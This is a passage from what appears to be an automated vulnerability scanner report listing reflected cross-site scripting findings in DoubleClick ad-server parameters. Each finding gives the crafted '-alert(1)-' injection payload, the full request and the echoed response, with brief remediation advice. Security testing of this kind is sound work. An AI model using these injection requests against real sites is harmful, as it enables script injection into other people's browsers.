Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:24:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7452

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=129713180380c02"-alert(1)-"5944b1be99f&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/landing4.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_zero.swf-_-X_1_ML_Edge_Site
...[SNIP]...

1.5. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b520"-alert(1)-"016294d38d8 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=6323104b520"-alert(1)-"016294d38d8&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:24:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7452

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=6323104b520"-alert(1)-"016294d38d8&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/landing4.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_ze
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_pm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce61"-alert(1)-"f8f18babff8 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957fce61"-alert(1)-"f8f18babff8&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:25:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7483

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957fce61"-alert(1)-"f8f18babff8&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/ira100.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_OneHundred.swf-_-X_1_ML_Edge_Site_Retargeting_1_31_CPA_Optimization_
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab241"-alert(1)-"953a6304c42 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094ab241"-alert(1)-"953a6304c42&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:25:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7563

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094ab241"-alert(1)-"953a6304c42&redirect=http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_AdviceGuidance.swf-_-X_1_ML_Edge_Site_Retargeting_1_31_CPA_
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3e59"-alert(1)-"bc570207b66 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0f3e59"-alert(1)-"bc570207b66&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:25:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7517

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0f3e59"-alert(1)-"bc570207b66&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/emergency-fund.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_EmergencyFund.swf-_-X_1_ML_Edge_Site_R
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6336"-alert(1)-"d2c6aa2a846 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cbe6336"-alert(1)-"d2c6aa2a846&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:24:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7452

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cbe6336"-alert(1)-"d2c6aa2a846&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/landing4.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-
...[SNIP]...

1.10. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa54e'-alert(1)-'81bad4f984e was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064aa54e'-alert(1)-'81bad4f984e&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:28 GMT
Expires: Tue, 08 Feb 2011 02:37:28 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064aa54e'-alert(1)-'81bad4f984e&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=7527390?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.11. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 857b4'-alert(1)-'08732a8e926 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091857b4'-alert(1)-'08732a8e926&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:30 GMT
Expires: Tue, 08 Feb 2011 02:37:30 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091857b4'-alert(1)-'08732a8e926&_pm=97957&_pn=17097094&redirect=;ord=7529577?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.12. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c60b'-alert(1)-'523339f5bfc was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=979573c60b'-alert(1)-'523339f5bfc&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:26 GMT
Expires: Tue, 08 Feb 2011 02:37:26 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=979573c60b'-alert(1)-'523339f5bfc&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=7525343?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\
...[SNIP]...

1.13. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_et parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c07e'-alert(1)-'28d99075a5e was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=12971318034c07e'-alert(1)-'28d99075a5e&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:27 GMT
Expires: Tue, 08 Feb 2011 02:37:27 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=12971318034c07e'-alert(1)-'28d99075a5e&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=7526405?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.14. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6569c'-alert(1)-'0822de605bd was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=6323106569c'-alert(1)-'0822de605bd&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:24 GMT
Expires: Tue, 08 Feb 2011 02:37:24 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=6323106569c'-alert(1)-'0822de605bd&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=7524249?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BOR
...[SNIP]...

1.15. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_pm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

